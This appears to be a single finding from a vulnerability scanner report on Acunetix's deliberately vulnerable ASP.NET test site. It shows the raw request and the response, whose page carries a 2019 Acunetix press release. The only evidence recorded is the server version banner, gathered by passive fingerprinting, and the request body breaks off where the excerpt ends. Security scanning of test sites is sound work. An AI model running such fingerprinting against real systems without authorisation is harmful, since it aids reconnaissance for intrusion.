Response Body - size: 22,936 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WBB4EVGV4dAUSUmVhZCB1c2VyIGNvbW1lbnRzHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0wZGQCCw8WAh4Dc3JjBQxhZHMvZGVmLmh0bWxkZKl3HbqwkCOjuj45XaEhgnLsklpZ" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLH7tLMBwL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBNBPxOo+suXOQO2cYqA7NT0P30nF" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> – <strong>May 2019</strong> – Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p> <p>“No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,” said Nicolas Sciberras, CTO.</p> <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p> <p><strong>More Features in the Latest Build</strong></p> <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p> <p>- Support for IPv6<br /> - Improved usage of machine resources<br /> - Added support for Selenium scripts as import files<br /> - Multiple vulnerability checks for SAP<br /> - Unauthorized access detection for Redis and Memcached<br /> - Source code disclosure for Ruby and Python</p> <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p> <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p> <p><strong>Acunetix, the Company</strong></p> <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=2
Method	POST
Parameter
Attack
Evidence	Microsoft-IIS/8.5
Show / hide Request and Response
Request Header - size: 464 bytes.	POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=2 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2 Content-Length: 10945 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 10,945 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc%2BQWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3Z